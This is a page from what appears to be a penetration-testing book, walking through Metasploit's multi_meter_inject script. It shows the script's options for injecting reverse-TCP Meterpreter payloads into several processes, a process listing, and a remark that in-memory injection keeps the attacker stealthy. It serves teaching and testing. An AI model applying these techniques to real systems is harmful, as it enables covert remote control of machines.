236
Chapter 16
different processes. To begin, take a look at this script in Meterpreter to see
what flags and syntax are included:
meterpreter >
run multi_meter_inject -h
Meterpreter script for injecting a reverse tcp Meterpreter payload into memory space of
multiple PID's. If none is provided, notepad.exe will be spawned and the meterpreter
payload injected into it.
OPTIONS:
-h
Help menu.
-m
Start Exploit multi/handler for return connection
-mp <opt>
Provide Multiple PID for connections separated by comma one per IP.
-mr <opt>
Provide Multiple IP Addresses for Connections separated by comma.
-p
<opt>
The port on the remote host where Metasploit is listening (default: 4444)
-pt
<opt>
Specify Reverse Connection Meterpreter Payload. Default windows/
meterpreter/reverse_tcp
meterpreter >
The first option is the
-m
flag , which automatically sets up a new handler
for us on the return connection. We would not need to set this option if we
were going to use the same port (for example, 443). Next we specify the pro-
cess IDs (PIDs) that we need and the shells into which they will be injected.
Meterpreter executes in memory only. When we inject into a process, we
are injecting Meterpreter into the memory space of that process. This allows
us to remain stealthy, never reading or writing files to disk, while ultimately
having multiple shells available to us.
We then set the IP address and port number on the attacking machine
to which we want the new Meterpreter session to connect.
We issue the
ps
command within Meterpreter to get a list of running
processes:
meterpreter >
ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System
256 smss.exe
364 csrss.exe
412 wininit.exe
424 csrss.exe
472 winlogon.exe
516 services.exe
524 lsass.exe
532 lsm.exe
2808 iexplorer.exe
x86
meterpreter >